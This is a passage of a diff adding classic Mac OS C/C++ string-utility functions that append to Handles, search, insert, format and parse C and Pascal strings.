+		handleCurrentLength = *currentLength;
+	}
+	
+	else
+	{
+		handleCurrentLength = CStrLength(*theHandle);
+	}
+	
+	
+	byteCount = handleCurrentLength + numChars + 1;
+	
+	if (byteCount > handleMaxLength)
+	{
+		SetHandleSize(theHandle,handleCurrentLength + numChars + 1);
+		
+		if (maxLength != nil)
+		{
+			*maxLength = GetHandleSize(theHandle);
+			
+			handleMaxLength = *maxLength;
+		}
+		
+		else
+		{
+			handleMaxLength = GetHandleSize(theHandle);
+		}
+
+		if (byteCount > handleMaxLength)
+		{
+			SetErrorMessageAndLongIntAndBail("AppendCharsToHandle: Can't increase Handle allocation, MemError() = ",MemError());
+		}
+	}
+	
+	
+	BlockMove(theChars,*theHandle + handleCurrentLength,numChars);
+	
+	(*theHandle)[handleCurrentLength + numChars] = '\0';
+	
+	if (currentLength != nil)
+	{
+		*currentLength += numChars;
+	}
+
+
+	errCode = noErr;
+	
+	
+EXITPOINT:
+
+	return(errCode);
+}
+
+
+
+OSErr AppendLongIntToHandle(const long inTheLongInt,Handle theHandle,long *currentLength)
+{
+OSErr		errCode = noErr;
+char		tempString[32];
+	
+	
+	CopyLongIntToCStr(inTheLongInt,tempString,sizeof(tempString));
+	
+	errCode = AppendCStrToHandle(tempString,theHandle,currentLength);
+
+	return(errCode);
+}
+
+
+
+
+long CStrLength(const char *theCString)
+{
+long	cStrLength = 0;
+
+	
+	if (theCString != nil)
+	{
+		for (cStrLength = 0;theCString[cStrLength] != 0;cStrLength++)
+		{
+		
+		}
+	}
+	
+	
+	return(cStrLength);
+}
+
+
+
+long PStrLength(const unsigned char *thePString)
+{
+long	pStrLength = 0;
+
+	
+	if (thePString != nil)
+	{
+		pStrLength = thePString[0];
+	}
+	
+	
+	return(pStrLength);
+}
+
+
+
+
+
+void ZeroMem(void *theMemPtr,const unsigned long numBytes)
+{
+unsigned char	*theBytePtr;
+unsigned long	*theLongPtr;
+unsigned long	numSingleBytes;
+unsigned long	theNumBytes;
+
+	
+	theNumBytes = numBytes;
+	
+	if (theMemPtr != nil && theNumBytes > 0)
+	{
+		theBytePtr = (unsigned char	*) theMemPtr;
+		
+		numSingleBytes = (unsigned long) theBytePtr & 0x0003;
+		
+		while (numSingleBytes > 0)
+		{
+			*theBytePtr++ = 0;
+			
+			theNumBytes--;
+			numSingleBytes--;
+		}
+		
+
+		theLongPtr = (unsigned long	*) theBytePtr;
+		
+		while (theNumBytes >= 4)
+		{
+			*theLongPtr++ = 0;
+			
+			theNumBytes -= 4;
+		}
+		
+		
+		theBytePtr = (unsigned char	*) theLongPtr;
+		
+		while (theNumBytes > 0)
+		{
+			*theBytePtr++ = 0;
+			
+			theNumBytes--;
+		}
+	}
+}
+
+
+
+
+char *FindCharInCStr(const char theChar,const char *theCString)
+{
+char	*theStringSearchPtr;
+
+	
+	theStringSearchPtr = (char	*) theCString;
+	
+	if (theStringSearchPtr != nil)
+	{
+		while (*theStringSearchPtr != '\0' && *theStringSearchPtr != theChar)
+		{
+			theStringSearchPtr++;
+		}
+		
+		if (*theStringSearchPtr == '\0')
+		{
+			theStringSearchPtr = nil;
+		}
+	}
+	
+	return(theStringSearchPtr);
+}
+
+
+
+long FindCharOffsetInCStr(const char theChar,const char *theCString,const Boolean inIgnoreCase)
+{
+long	theOffset = -1;
+
+
+	if (theCString != nil)
+	{
+		theOffset = 0;
+		
+
+		if (inIgnoreCase)
+		{
+		char	searchChar = theChar;
+		
+			if (searchChar >= 'a' && searchChar <= 'z')
+			{
+				searchChar = searchChar - 'a' + 'A';
+			}
+			
+			
+			while (*theCString != 0)
+			{
+			char	currentChar = *theCString;
+			
+				if (currentChar >= 'a' && currentChar <= 'z')
+				{
+					currentChar = currentChar - 'a' + 'A';
+				}
+			
+				if (currentChar == searchChar)
+				{
+					break;
+				}
+				
+				theCString++;
+				theOffset++;
+			}
+		}
+		
+		else
+		{
+			while (*theCString != 0 && *theCString != theChar)
+			{
+				theCString++;
+				theOffset++;
+			}
+		}
+		
+		if (*theCString == 0)
+		{
+			theOffset = -1;
+		}
+	}
+	
+	return(theOffset);
+}
+
+
+long FindCStrOffsetInCStr(const char *theCSubstring,const char *theCString,const Boolean inIgnoreCase)
+{
+long	theOffset = -1;
+
+
+	if (theCSubstring != nil && theCString != nil)
+	{
+		for (theOffset = 0;;theOffset++)
+		{
+			if (theCString[theOffset] == 0)
+			{
+				theOffset = -1;
+				
+				goto EXITPOINT;
+			}
+			
+			
+			for (const char	*tempSubstringPtr = theCSubstring,*tempCStringPtr = theCString + theOffset;;tempSubstringPtr++,tempCStringPtr++)
+			{
+				if (*tempSubstringPtr == 0)
+				{
+					goto EXITPOINT;
+				}
+				
+				else if (*tempCStringPtr == 0)
+				{
+					break;
+				}
+			
+			char	searchChar = *tempSubstringPtr;
+			char	currentChar = *tempCStringPtr;
+			
+				if (inIgnoreCase && searchChar >= 'a' && searchChar <= 'z')
+				{
+					searchChar = searchChar - 'a' + 'A';
+				}
+				
+				if (inIgnoreCase && currentChar >= 'a' && currentChar <= 'z')
+				{
+					currentChar = currentChar - 'a' + 'A';
+				}
+				
+				if (currentChar != searchChar)
+				{
+					break;
+				}
+			}
+		}
+		
+		theOffset = -1;
+	}
+
+
+EXITPOINT:
+	
+	return(theOffset);
+}
+
+
+
+void InsertCStrIntoCStr(const char *theSrcCStr,const int theInsertionOffset,char *theDstCStr,const int maxDstStrLength)
+{
+int		currentLength;
+int		insertLength;
+int		numCharsToInsert;
+int		numCharsToShift;
+
+	
+	if (theDstCStr != nil && theSrcCStr != nil && maxDstStrLength > 0 && theInsertionOffset < maxDstStrLength - 1)
+	{
+		currentLength = CStrLength(theDstCStr);
+		
+		insertLength = CStrLength(theSrcCStr);
+		
+
+		if (theInsertionOffset + insertLength < maxDstStrLength - 1)
+		{
+			numCharsToInsert = insertLength;
+		}
+		
+		else
+		{
+			numCharsToInsert = maxDstStrLength - 1 - theInsertionOffset;
+		}
+		
+
+		if (numCharsToInsert + currentLength < maxDstStrLength - 1)
+		{
+			numCharsToShift = currentLength - theInsertionOffset;
+		}
+		
+		else
+		{
+			numCharsToShift = maxDstStrLength - 1 - theInsertionOffset - numCharsToInsert;
+		}
+
+		
+		if (numCharsToShift > 0)
+		{
+			BlockMove(theDstCStr + theInsertionOffset,theDstCStr + theInsertionOffset + numCharsToInsert,numCharsToShift);
+		}
+		
+		if (numCharsToInsert > 0)
+		{
+			BlockMove(theSrcCStr,theDstCStr + theInsertionOffset,numCharsToInsert);
+		}
+		
+		theDstCStr[theInsertionOffset + numCharsToInsert + numCharsToShift] = 0;
+	}
+}
+
+
+
+void InsertPStrIntoCStr(const unsigned char *theSrcPStr,const int theInsertionOffset,char *theDstCStr,const int maxDstStrLength)
+{
+int		currentLength;
+int		insertLength;
+int		numCharsToInsert;
+int		numCharsToShift;
+
+	
+	if (theDstCStr != nil && theSrcPStr != nil && maxDstStrLength > 0 && theInsertionOffset < maxDstStrLength - 1)
+	{
+		currentLength = CStrLength(theDstCStr);
+		
+		insertLength = PStrLength(theSrcPStr);
+		
+
+		if (theInsertionOffset + insertLength < maxDstStrLength - 1)
+		{
+			numCharsToInsert = insertLength;
+		}
+		
+		else
+		{
+			numCharsToInsert = maxDstStrLength - 1 - theInsertionOffset;
+		}
+		
+
+		if (numCharsToInsert + currentLength < maxDstStrLength - 1)
+		{
+			numCharsToShift = currentLength - theInsertionOffset;
+		}
+		
+		else
+		{
+			numCharsToShift = maxDstStrLength - 1 - theInsertionOffset - numCharsToInsert;
+		}
+
+		
+		if (numCharsToShift > 0)
+		{
+			BlockMove(theDstCStr + theInsertionOffset,theDstCStr + theInsertionOffset + numCharsToInsert,numCharsToShift);
+		}
+		
+		if (numCharsToInsert > 0)
+		{
+			BlockMove(theSrcPStr + 1,theDstCStr + theInsertionOffset,numCharsToInsert);
+		}
+		
+		theDstCStr[theInsertionOffset + numCharsToInsert + numCharsToShift] = 0;
+	}
+}
+
+
+
+OSErr InsertCStrIntoHandle(const char *theCString,Handle theHandle,const long inInsertOffset)
+{
+OSErr	errCode;
+int		currentLength;
+int		insertLength;
+
+	
+	SetErrorMessageAndBailIfNil(theCString,"InsertCStrIntoHandle: Bad parameter, theCString == nil");
+
+	SetErrorMessageAndBailIfNil(theHandle,"InsertCStrIntoHandle: Bad parameter, theHandle == nil");
+	
+	currentLength = CStrLength(*theHandle);
+	
+	if (currentLength + 1 > ::GetHandleSize(theHandle))
+	{
+		SetErrorMessageAndBail("InsertCStrIntoHandle: Handle has been overflowed");
+	}
+	
+	if (inInsertOffset > currentLength)
+	{
+		SetErrorMessageAndBail("InsertCStrIntoHandle: Insertion offset is greater than string length");
+	}
+	
+	insertLength = CStrLength(theCString);
+	
+	::SetHandleSize(theHandle,currentLength + 1 + insertLength);
+	
+	if (::GetHandleSize(theHandle) < currentLength + 1 + insertLength)
+	{
+		SetErrorMessageAndLongIntAndBail("InsertCStrIntoHandle: Can't expand storage for Handle, MemError() = ",MemError());
+	}
+	
+	::BlockMove(*theHandle + inInsertOffset,*theHandle + inInsertOffset + insertLength,currentLength - inInsertOffset + 1);
+	
+	::BlockMove(theCString,*theHandle + inInsertOffset,insertLength);
+
+
+	errCode = noErr;
+	
+	
+EXITPOINT:
+
+	return(errCode);
+}
+
+
+
+
+void CopyCStrAndInsert1LongIntIntoCStr(const char *theSrcCStr,const long theNum,char *theDstCStr,const int maxDstStrLength)
+{
+	CopyCStrAndInsertCStrLongIntIntoCStr(theSrcCStr,nil,theNum,theDstCStr,maxDstStrLength);
+}
+
+
+void CopyCStrAndInsert2LongIntsIntoCStr(const char *theSrcCStr,const long long1,const long long2,char *theDstCStr,const int maxDstStrLength)
+{
+const long	theLongInts[] = { long1,long2 };
+
+	CopyCStrAndInsertCStrsLongIntsIntoCStr(theSrcCStr,nil,theLongInts,theDstCStr,maxDstStrLength);
+}
+
+
+void CopyCStrAndInsert3LongIntsIntoCStr(const char *theSrcCStr,const long long1,const long long2,const long long3,char *theDstCStr,const int maxDstStrLength)
+{
+const long	theLongInts[] = { long1,long2,long3 };
+
+	CopyCStrAndInsertCStrsLongIntsIntoCStr(theSrcCStr,nil,theLongInts,theDstCStr,maxDstStrLength);
+}
+
+
+void CopyCStrAndInsertCStrIntoCStr(const char *theSrcCStr,const char *theInsertCStr,char *theDstCStr,const int maxDstStrLength)
+{
+const char	*theCStrs[2] = { theInsertCStr,nil };
+
+	CopyCStrAndInsertCStrsLongIntsIntoCStr(theSrcCStr,theCStrs,nil,theDstCStr,maxDstStrLength);
+}
+
+
+
+void CopyCStrAndInsertCStrLongIntIntoCStr(const char *theSrcCStr,const char *theInsertCStr,const long theNum,char *theDstCStr,const int maxDstStrLength)
+{
+const char	*theCStrs[2] = { theInsertCStr,nil };
+const long	theLongInts[1] = { theNum };
+
+	CopyCStrAndInsertCStrsLongIntsIntoCStr(theSrcCStr,theCStrs,theLongInts,theDstCStr,maxDstStrLength);
+}
+
+
+
+void CopyCStrAndInsertCStrsLongIntsIntoCStr(const char *theSrcCStr,const char **theInsertCStrs,const long *theLongInts,char *theDstCStr,const int maxDstStrLength)
+{
+int			dstCharIndex,srcCharIndex,theMaxDstStrLength;
+int			theCStrIndex = 0;
+int			theLongIntIndex = 0;
+
+	
+	theMaxDstStrLength = maxDstStrLength;
+	
+	if (theDstCStr != nil && theSrcCStr != nil && theMaxDstStrLength > 0)
+	{
+		dstCharIndex = 0;
+		
+		srcCharIndex = 0;
+		
+		
+		//	Allow room for NULL at end of string
+		
+		theMaxDstStrLength--;
+		
+		
+		for (;;)
+		{
+			//	Hit end of buffer?
+			
+			if (dstCharIndex >= theMaxDstStrLength)
+			{
+				theDstCStr[dstCharIndex++] = 0;
+				
+				goto EXITPOINT;
+			}
+			
+			//	End of source string?
+			
+			else if (theSrcCStr[srcCharIndex] == 0)
+			{
+				theDstCStr[dstCharIndex++] = 0;
+				
+				goto EXITPOINT;
+			}
+			
+			//	Did we find a '%s'?
+			
+			else if (theInsertCStrs != nil && theInsertCStrs[theCStrIndex] != nil && theSrcCStr[srcCharIndex] == '%' && theSrcCStr[srcCharIndex + 1] == 's')
+			{
+				//	Skip over the '%s'
+				
+				srcCharIndex += 2;
+				
+				
+				//	Terminate the dest string and then concat the string
+				
+				theDstCStr[dstCharIndex] = 0;
+				
+				ConcatCStrToCStr(theInsertCStrs[theCStrIndex],theDstCStr,theMaxDstStrLength);
+				
+				dstCharIndex = CStrLength(theDstCStr);
+				
+				theCStrIndex++;
+			}
+			
+			//	Did we find a '%ld'?
+			
+			else if (theLongInts != nil && theSrcCStr[srcCharIndex] == '%' && theSrcCStr[srcCharIndex + 1] == 'l' && theSrcCStr[srcCharIndex + 2] == 'd')
+			{
+				//	Skip over the '%ld'
+				
+				srcCharIndex += 3;
+				
+				
+				//	Terminate the dest string and then concat the number
+				
+				theDstCStr[dstCharIndex] = 0;
+				
+				ConcatLongIntToCStr(theLongInts[theLongIntIndex],theDstCStr,theMaxDstStrLength);
+				
+				theLongIntIndex++;
+				
+				dstCharIndex = CStrLength(theDstCStr);
+			}
+			
+			else
+			{
+				theDstCStr[dstCharIndex++] = theSrcCStr[srcCharIndex++];
+			}
+		}
+	}
+
+
+
+EXITPOINT:
+
+	return;
+}
+
+
+
+
+
+OSErr CopyCStrAndInsertCStrLongIntIntoHandle(const char *theSrcCStr,const char *theInsertCStr,const long theNum,Handle *theHandle)
+{
+OSErr	errCode;
+long	byteCount;
+
+	
+	if (theHandle != nil)
+	{
+		byteCount = CStrLength(theSrcCStr) + CStrLength(theInsertCStr) + 32;
+		
+		*theHandle = NewHandle(byteCount);
+		
+		if (*theHandle == nil)
+		{
+			SetErrorMessageAndLongIntAndBail("CopyCStrAndInsertCStrLongIntIntoHandle: Can't allocate Handle, MemError() = ",MemError());
+		}
+		
+		
+		HLock(*theHandle);
+		
+		CopyCStrAndInsertCStrLongIntIntoCStr(theSrcCStr,theInsertCStr,theNum,**theHandle,byteCount);
+		
+		HUnlock(*theHandle);
+	}
+	
+	errCode = noErr;
+	
+	
+EXITPOINT:
+
+	return(errCode);
+}
+
+
+
+
+
+OSErr CopyIndexedWordToCStr(char *theSrcCStr,int whichWord,char *theDstCStr,int maxDstCStrLength)
+{
+OSErr		errCode;
+char		*srcCharPtr,*dstCharPtr;
+int			wordCount;
+int			byteCount;
+
+
+	if (theSrcCStr == nil)
+	{
+		SetErrorMessageAndBail(("CopyIndexedWordToCStr: Bad parameter, theSrcCStr == nil"));
+	}
+	
+	if (theDstCStr == nil)
+	{
+		SetErrorMessageAndBail(("CopyIndexedWordToCStr: Bad parameter, theDstCStr == nil"));
+	}
+	
+	if (whichWord < 0)
+	{
+		SetErrorMessageAndBail(("CopyIndexedWordToCStr: Bad parameter, whichWord < 0"));
+	}
+	
+	if (maxDstCStrLength <= 0)
+	{
+		SetErrorMessageAndBail(("CopyIndexedWordToCStr: Bad parameter, maxDstCStrLength <= 0"));
+	}
+
+	
+	*theDstCStr = '\0';
+	
+	srcCharPtr = theSrcCStr;
+
+	while (*srcCharPtr == ' ' || *srcCharPtr == '\t')
+	{
+		srcCharPtr++;
+	}
+	
+
+	for (wordCount = 0;wordCount < whichWord;wordCount++)
+	{
+		while (*srcCharPtr != ' ' && *srcCharPtr != '\t' && *srcCharPtr != '\r' && *srcCharPtr != '\n' && *srcCharPtr != '\0')
+		{
+			srcCharPtr++;
+		}
+		
+		if (*srcCharPtr == '\r' || *srcCharPtr == '\n' || *srcCharPtr == '\0')
+		{
+			errCode = noErr;
+			
+			goto EXITPOINT;
+		}
+
+		while (*srcCharPtr == ' ' || *srcCharPtr == '\t')
+		{
+			srcCharPtr++;
+		}
+		
+		if (*srcCharPtr == '\r' || *srcCharPtr == '\n' || *srcCharPtr == '\0')
+		{
+			errCode = noErr;
+			
+			goto EXITPOINT;
+		}
+	}
+
+
+	dstCharPtr = theDstCStr;
+	byteCount = 0;
+	
+	
+	for(;;)
+	{
+		if (byteCount >= maxDstCStrLength - 1 || *srcCharPtr == '\0' || *srcCharPtr == ' ' || *srcCharPtr == '\t' || *srcCharPtr == '\r' || *srcCharPtr == '\n')
+		{
+			*dstCharPtr = '\0';
+			break;
+		}
+		
+		*dstCharPtr++ = *srcCharPtr++;
+		
+		byteCount++;
+	}
+
+
+	errCode = noErr;
+
+
+EXITPOINT:
+
+	return(errCode);
+}
+
+
+
+
+
+OSErr CopyIndexedWordToNewHandle(char *theSrcCStr,int whichWord,Handle *outTheHandle)
+{
+OSErr		errCode;
+char		*srcCharPtr;
+int			wordCount;
+int			byteCount;
+
+
+	if (theSrcCStr == nil)
+	{
+		SetErrorMessageAndBail(("CopyIndexedWordToNewHandle: Bad parameter, theSrcCStr == nil"));
+	}
+	
+	if (outTheHandle == nil)
+	{
+		SetErrorMessageAndBail(("CopyIndexedWordToNewHandle: Bad parameter, outTheHandle == nil"));
+	}
+	
+	if (whichWord < 0)
+	{
+		SetErrorMessageAndBail(("CopyIndexedWordToNewHandle: Bad parameter, whichWord < 0"));
+	}
+
+	
+	*outTheHandle = nil;
+	
+
+	srcCharPtr = theSrcCStr;
+
+	while (*srcCharPtr == ' ' || *srcCharPtr == '\t')
+	{
+		srcCharPtr++;
+	}
+	
+
+	for (wordCount = 0;wordCount < whichWord;wordCount++)
+	{
+		while (*srcCharPtr != ' ' && *srcCharPtr != '\t' && *srcCharPtr != '\r' && *srcCharPtr != '\n' && *srcCharPtr != '\0')
+		{
+			srcCharPtr++;
+		}
+		
+		if (*srcCharPtr == '\r' || *srcCharPtr == '\n' || *srcCharPtr == '\0')
+		{
+			break;
+		}
+
+		while (*srcCharPtr == ' ' || *srcCharPtr == '\t')
+		{
+			srcCharPtr++;
+		}
+		
+		if (*srcCharPtr == '\r' || *srcCharPtr == '\n' || *srcCharPtr == '\0')
+		{
+			break;
+		}
+	}
+
+
+	for (byteCount = 0;;byteCount++)
+	{
+		if (srcCharPtr[byteCount] == ' ' || srcCharPtr[byteCount] == '\t' || srcCharPtr[byteCount] == '\r' || srcCharPtr[byteCount] == '\n' || srcCharPtr[byteCount] == '\0')
+		{
+			break;
+		}
+	}
+
+	
+	*outTheHandle = NewHandle(byteCount + 1);
+	
+	if (*outTheHandle == nil)
+	{
+		SetErrorMessageAndLongIntAndBail("CopyIndexedWordToNewHandle: Can't allocate Handle, MemError() = ",MemError());
+	}
+	
+	
+	::BlockMove(srcCharPtr,**outTheHandle,byteCount);
+	
+	(**outTheHandle)[byteCount] = '\0';
+
+	errCode = noErr;
+
+
+EXITPOINT:
+
+	return(errCode);
+}
+
+
+
+OSErr CopyIndexedLineToCStr(const char *theSrcCStr,int inWhichLine,int *lineEndIndex,Boolean *gotLastLine,char *theDstCStr,const int maxDstCStrLength)
+{
+OSErr		errCode;
+int			theCurrentLine;
+int			theCurrentLineOffset;
+int			theEOSOffset;
+
+
+	if (theSrcCStr == nil)
+	{
+		SetErrorMessageAndBail(("CopyIndexedLineToCStr: Bad parameter, theSrcCStr == nil"));
+	}
+	
+	if (theDstCStr == nil)
+	{
+		SetErrorMessageAndBail(("CopyIndexedLineToCStr: Bad parameter, theDstCStr == nil"));
+	}
+	
+	if (inWhichLine < 0)
+	{
+		SetErrorMessageAndBail(("CopyIndexedLineToCStr: Bad parameter, inWhichLine < 0"));
+	}
+	
+	if (maxDstCStrLength <= 0)
+	{
+		SetErrorMessageAndBail(("CopyIndexedLineToCStr: Bad parameter, maxDstCStrLength <= 0"));
+	}
+	
+	
+	if (gotLastLine != nil)
+	{
+		*gotLastLine = false;
+	}
+
+	
+	*theDstCStr = 0;
+	
+	theCurrentLineOffset = 0;
+	
+	theCurrentLine = 0;
+	
+	
+	while (theCurrentLine < inWhichLine)
+	{
+		while (theSrcCStr[theCurrentLineOffset] != '\r' && theSrcCStr[theCurrentLineOffset] != 0)
+		{
+			theCurrentLineOffset++;
+		}
+		
+		if (theSrcCStr[theCurrentLineOffset] == 0)
+		{
+			break;
+		}
+		
+		theCurrentLineOffset++;
+		theCurrentLine++;
+	}
+		
+	if (theSrcCStr[theCurrentLineOffset] == 0)
+	{
+		SetErrorMessageAndLongIntAndBail("CopyIndexedLineToCStr: Too few lines in source text, can't get line ",inWhichLine);
+	}
+
+
+	theEOSOffset = FindCharOffsetInCStr('\r',theSrcCStr + theCurrentLineOffset);
+	
+	if (theEOSOffset >= 0)
+	{
+		CopyCSubstrToCStr(theSrcCStr + theCurrentLineOffset,theEOSOffset,theDstCStr,maxDstCStrLength);
+		
+		if (gotLastLine != nil)
+		{
+			*gotLastLine = false;
+		}
+	
+		if (lineEndIndex != nil)
+		{
+			*lineEndIndex = theEOSOffset;
+		}
+	}
+	
+	else
+	{
+		theEOSOffset = CStrLength(theSrcCStr + theCurrentLineOffset);
+
+		CopyCSubstrToCStr(theSrcCStr + theCurrentLineOffset,theEOSOffset,theDstCStr,maxDstCStrLength);
+		
+		if (gotLastLine != nil)
+		{
+			*gotLastLine = true;
+		}
+	
+		if (lineEndIndex != nil)
+		{
+			*lineEndIndex = theEOSOffset;
+		}
+	}
+	
+
+	errCode = noErr;
+
+
+EXITPOINT:
+
+	return(errCode);
+}
+
+
+
+OSErr CopyIndexedLineToNewHandle(const char *theSrcCStr,int inWhichLine,Handle *outNewHandle)
+{
+OSErr		errCode;
+int			theCurrentLine;
+int			theCurrentLineOffset;
+int			byteCount;
+
+
+	SetErrorMessageAndBailIfNil(theSrcCStr,"CopyIndexedLineToNewHandle: Bad parameter, theSrcCStr == nil");
+	SetErrorMessageAndBailIfNil(outNewHandle,"CopyIndexedLineToNewHandle: Bad parameter, outNewHandle == nil");
+	
+	if (inWhichLine < 0)
+	{
+		SetErrorMessageAndBail(("CopyIndexedLineToNewHandle: Bad parameter, inWhichLine < 0"));
+	}
+	
+
+	theCurrentLineOffset = 0;
+	
+	theCurrentLine = 0;
+	
+	
+	while (theCurrentLine < inWhichLine)
+	{
+		while (theSrcCStr[theCurrentLineOffset] != '\r' && theSrcCStr[theCurrentLineOffset] != '\0')
+		{
+			theCurrentLineOffset++;
+		}
+		
+		if (theSrcCStr[theCurrentLineOffset] == '\0')
+		{
+			break;
+		}
+		
+		theCurrentLineOffset++;
+		theCurrentLine++;
+	}
+		
+	if (theSrcCStr[theCurrentLineOffset] == '\0')
+	{
+		SetErrorMessageAndLongIntAndBail("CopyIndexedLineToNewHandle: Too few lines in source text, can't get line #",inWhichLine);
+	}
+
+	
+	byteCount = 0;
+	
+	while (theSrcCStr[theCurrentLineOffset + byteCount] != '\r' && theSrcCStr[theCurrentLineOffset + byteCount] != '\0')
+	{
+		byteCount++;
+	}
+		
+	
+	*outNewHandle = NewHandle(byteCount + 1);
+	
+	if (*outNewHandle == nil)
+	{
+		SetErrorMessageAndLongIntAndBail("CopyIndexedLineToNewHandle: Can't allocate Handle, MemError() = ",MemError());
+	}
+	
+	::BlockMove(theSrcCStr + theCurrentLineOffset,**outNewHandle,byteCount);
+	
+	(**outNewHandle)[byteCount] = '\0';
+
+	errCode = noErr;
+
+
+EXITPOINT:
+
+	return(errCode);
+}
+
+
+
+
+OSErr CountDigits(const char *inCStr,int *outNumIntegerDigits,int *outNumFractDigits)
+{
+OSErr	errCode = noErr;
+int		numIntDigits = 0;
+int		numFractDigits = 0;
+int 	digitIndex = 0;
+
+	
+	SetErrorMessageAndBailIfNil(inCStr,"CountDigits: Bad parameter, theSrcCStr == nil");
+	SetErrorMessageAndBailIfNil(outNumIntegerDigits,"CountDigits: Bad parameter, outNumIntegerDigits == nil");
+	SetErrorMessageAndBailIfNil(outNumFractDigits,"CountDigits: Bad parameter, outNumFractDigits == nil");
+	
+	digitIndex = 0;
+	
+	while (inCStr[digitIndex] >= '0' && inCStr[digitIndex] <= '9')
+	{
+		digitIndex++;
+		numIntDigits++;
+	}
+	
+	if (inCStr[digitIndex] == '.')
+	{
+		digitIndex++;
+		
+		while (inCStr[digitIndex] >= '0' && inCStr[digitIndex] <= '9')
+		{
+			digitIndex++;
+			numFractDigits++;
+		}
+	}
+	
+	*outNumIntegerDigits = numIntDigits;
+	
+	*outNumFractDigits = numFractDigits;
+	
+	errCode = noErr;
+	
+EXITPOINT:
+
+	return(errCode);
+}
+
+
+
+OSErr ExtractIntFromCStr(const char *theSrcCStr,int *outInt,Boolean skipLeadingSpaces)
+{
+OSErr		errCode;
+int			theCharIndex;
+
+
+	if (theSrcCStr == nil)
+	{
+		SetErrorMessageAndBail(("ExtractIntFromCStr: Bad parameter, theSrcCStr == nil"));
+	}
+	
+	if (outInt == nil)
+	{
+		SetErrorMessageAndBail(("ExtractIntFromCStr: Bad parameter, outInt == nil"));
+	}	
+
+	
+	*outInt = 0;
+	
+	theCharIndex = 0;
+	
+	if (skipLeadingSpaces == true)
+	{
+		while (theSrcCStr[theCharIndex] == ' ')
+		{
+			theCharIndex++;
+		}
+	}
+	
+	if (theSrcCStr[theCharIndex] < '0' || theSrcCStr[theCharIndex] > '9')
+	{
+		SetErrorMessageAndBail(("ExtractIntFromCStr: Bad parameter, theSrcCStr contains a bogus numeric representation"));
+	}
+
+
+	while (theSrcCStr[theCharIndex] >= '0' && theSrcCStr[theCharIndex] <= '9')
+	{
+		*outInt = (*outInt * 10) + (theSrcCStr[theCharIndex] - '0');
+		
+		theCharIndex++;
+	}
+	
+
+	errCode = noErr;
+
+
+EXITPOINT:
+
+	return(errCode);
+}
+
+
+
+OSErr ExtractIntFromPStr(const unsigned char *theSrcPStr,int *outInt,Boolean skipLeadingSpaces)
+{
+OSErr		errCode;
+char		theCStr[256];
+
+
+	if (theSrcPStr == nil)
+	{
+		SetErrorMessageAndBail(("ExtractIntFromPStr: Bad parameter, theSrcPStr == nil"));
+	}
+	
+	if (outInt == nil)
+	{
+		SetErrorMessageAndBail(("ExtractIntFromPStr: Bad parameter, outInt == nil"));
+	}
+	
+	
+	CopyPStrToCStr(theSrcPStr,theCStr,sizeof(theCStr));
+	
+	
+	errCode = ExtractIntFromCStr(theCStr,outInt,skipLeadingSpaces);
+
+
+EXITPOINT:
+
+	return(errCode);
+}
+
+
+
+int CountOccurencesOfCharInCStr(const char inChar,const char *inSrcCStr)
+{
+int		theSrcCharIndex;
+int		numOccurrences = -1;
+
+
+	if (inSrcCStr != nil && inChar != '\0')
+	{
+		numOccurrences = 0;
+		
+		for (theSrcCharIndex = 0;inSrcCStr[theSrcCharIndex] != '\0';theSrcCharIndex++)
+		{
+			if (inSrcCStr[theSrcCharIndex] == inChar)
+			{
+				numOccurrences++;
+			}
+		}
+	}
+	
+	return(numOccurrences);
+}
+
+
+int CountWordsInCStr(const char *inSrcCStr)
+{
+int		numWords = -1;
+
+
+	if (inSrcCStr != nil)
+	{
+		numWords = 0;
+		
+		//	Skip lead spaces
+		
+		while (*inSrcCStr == ' ')
+		{
+			inSrcCStr++;
+		}
+
+		while (*inSrcCStr != '\0')
+		{
+			numWords++;
+
+			while (*inSrcCStr != ' ' && *inSrcCStr != '\0')
+			{
+				inSrcCStr++;
+			}
+			
+			while (*inSrcCStr == ' ')
+			{
+				inSrcCStr++;
+			}
+		}
+	}
+	
+	return(numWords);
+}
+
+
+
+
+void ConvertCStrToUpperCase(char *theSrcCStr)
+{
+char		*theCharPtr;
+
+
+	if (theSrcCStr != nil)
+	{
+		theCharPtr = theSrcCStr;
+		
+		while (*theCharPtr != 0)
+		{
+			if (*theCharPtr >= 'a' && *theCharPtr <= 'z')
+			{
+				*theCharPtr = *theCharPtr - 'a' + 'A';
+			}
+			
+			theCharPtr++;
+		}
+	}
+}
+
+
+
+
+
+
+
+void ExtractCStrItemFromCStr(const char *inSrcCStr,const char inItemDelimiter,const int inItemNumber,Boolean *foundItem,char *outDstCharPtr,const int inDstCharPtrMaxLength,const Boolean inTreatMultipleDelimsAsSingleDelim)
+{
+int		theItem;
+int		theSrcCharIndex;
+int		theDstCharIndex;
+
+
+	if (foundItem != nil)
+	{
+		*foundItem = false;
+	}
+	
+	
+	if (outDstCharPtr != nil && inDstCharPtrMaxLength > 0 && inItemNumber >= 0 && inItemDelimiter != 0)
+	{
+		*outDstCharPtr = 0;
+		
+
+		theSrcCharIndex = 0;
+		
+		for (theItem = 0;theItem < inItemNumber;theItem++)
+		{
+			while (inSrcCStr[theSrcCharIndex] != inItemDelimiter && inSrcCStr[theSrcCharIndex] != '\0')
+			{
+				theSrcCharIndex++;
+			}
+			
+			if (inSrcCStr[theSrcCharIndex] == inItemDelimiter)
+			{
+				theSrcCharIndex++;
+				
+				if (inTreatMultipleDelimsAsSingleDelim)
+				{
+					while (inSrcCStr[theSrcCharIndex] == inItemDelimiter)
+					{
+						theSrcCharIndex++;
+					}
+				}
+			}
+			
+			
+			if (inSrcCStr[theSrcCharIndex] == '\0')
+			{
+				goto EXITPOINT;
+			}
+		}
+		
+
+		if (foundItem != nil)
+		{
+			*foundItem = true;
+		}
+		
+		
+		theDstCharIndex = 0;
+		
+		for (;;)
+		{
+			if (inSrcCStr[theSrcCharIndex] == 0 || inSrcCStr[theSrcCharIndex] == inItemDelimiter || theDstCharIndex >= inDstCharPtrMaxLength - 1)
+			{
+				outDstCharPtr[theDstCharIndex] = 0;
+				
+				break;
+			}
+			
+			outDstCharPtr[theDstCharIndex++] = inSrcCStr[theSrcCharIndex++];
+		}
+	}
+	
+	
+EXITPOINT:
+
+	return;
+}
+
+
+
+OSErr ExtractCStrItemFromCStrIntoNewHandle(const char *inSrcCStr,const char inItemDelimiter,const int inItemNumber,Boolean *foundItem,Handle *outNewHandle,const Boolean inTreatMultipleDelimsAsSingleDelim)
+{
+OSErr	errCode;
+int		theItem;
+int		theSrcCharIndex;
+int		theItemLength;
+
+
+	if (inSrcCStr == nil)
+	{
